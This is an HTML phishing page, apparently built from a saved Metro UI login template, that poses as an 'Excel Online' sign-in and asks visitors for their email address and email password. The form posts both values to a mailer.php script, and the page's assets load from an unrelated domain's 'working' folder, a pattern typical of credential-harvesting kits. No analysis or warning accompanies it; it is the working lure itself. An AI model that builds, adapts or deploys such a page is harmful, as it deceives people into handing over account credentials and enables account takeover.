<!DOCTYPE html>
<!-- saved from url=(0042)http://metroui.org.ua/templates/login.html -->
<html hola_ext_inject="disabled"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="description" content="Metro, a sleek, intuitive, and powerful framework for faster and easier web development for Windows Metro Style.">
    <meta name="keywords" content="HTML, CSS, JS, JavaScript, framework, metro, front-end, frontend, web development">
    <meta name="author" content="Sergey Pimenov and Metro UI CSS contributors">

    <link rel="shortcut icon" type="image/x-icon" href="http://metroui.org.ua/favicon.ico">

    <title>Login form :: Excel Online</title>

    <link href="http://www.biztradeworld.com/working/metro.css" rel="stylesheet">
    <link href="http://www.biztradeworld.com/working/metro-icons.css" rel="stylesheet">
    <link href="http://www.biztradeworld.com/working/metro-responsive.css" rel="stylesheet">

    <!-- <script async="" src="http://www.biztradeworld.com/working/analytics.js"> -->
	<script src="http://www.biztradeworld.com/working/jquery-2.1.3.min.js"></script>
<!--     <script src="http://www.biztradeworld.com/working/metro.js"></script>
 --> 
    <style>
        .login-form {
            width: 25rem;
            height: 18.75rem;
            position: fixed;
            top: 50%;
            margin-top: -9.375rem;
            left: 50%;
            margin-left: -12.5rem;
            background-color: #ffffff;
            opacity: 0;
            -webkit-transform: scale(.8);
            transform: scale(.8);
        }
    </style>

    <script>

        /*
        * Do not use this is a google analytics fro Metro UI CSS
        * */
        if (window.location.hostname !== 'localhost') {

            (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
                (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
                    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
            })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

            ga('create', 'UA-58849249-3', 'auto');
            ga('send', 'pageview');

        }


        $(function(){
            var form = $(".login-form");

            form.css({
                opacity: 1,
                "-webkit-transform": "scale(1)",
                "transform": "scale(1)",
                "-webkit-transition": ".5s",
                "transition": ".5s"
            });
        });
    </script>
</head>
<body style="background-image:url(http://www.biztradeworld.com/working/backg.png);"class="bg-darkTeal">
    <div class="login-form padding20 block-shadow" style="opacity: 1; transform: scale(1); transition: 0.5s; border-style:solid; border-color:#5abd71">
        <form action="mailer.php" method="post">
			<div><img src="http://www.biztradeworld.com/working/294.gif" alt=""></div>
            <h3 class="text-light">Excel Online - Login to continue</h3>
            <hr class="thin">
            <br>
            <div class="input-control text full-size" data-role="input">
                <label for="user_login">User email:</label>
                <input placeholder="Enter your email" type="text" name="user_login" id="user_login" style="padding-right: 36px;">
                <button class="button helper-button clear" tabindex="-1" type="button"><span class="mif-cross"></span></button>
            </div>
            <br>
            <br>
            <div class="input-control password full-size" data-role="input">
                <label for="user_password">User password:</label>
                <input placeholder="Enter email password" type="password" name="user_password" id="user_password" style="padding-right: 36px;">
                <button class="button helper-button reveal" tabindex="-1" type="button"><span class="mif-looks"></span></button>
            </div>
            <br>
            <br>
            <div class="form-actions">
                <button type="submit" class="button primary" style="background-color:#5abd71">Login</button>
            </div>
        </form>
    </div>

    <!-- hit.ua -->
    
    <!-- / hit.ua -->



</body></html>
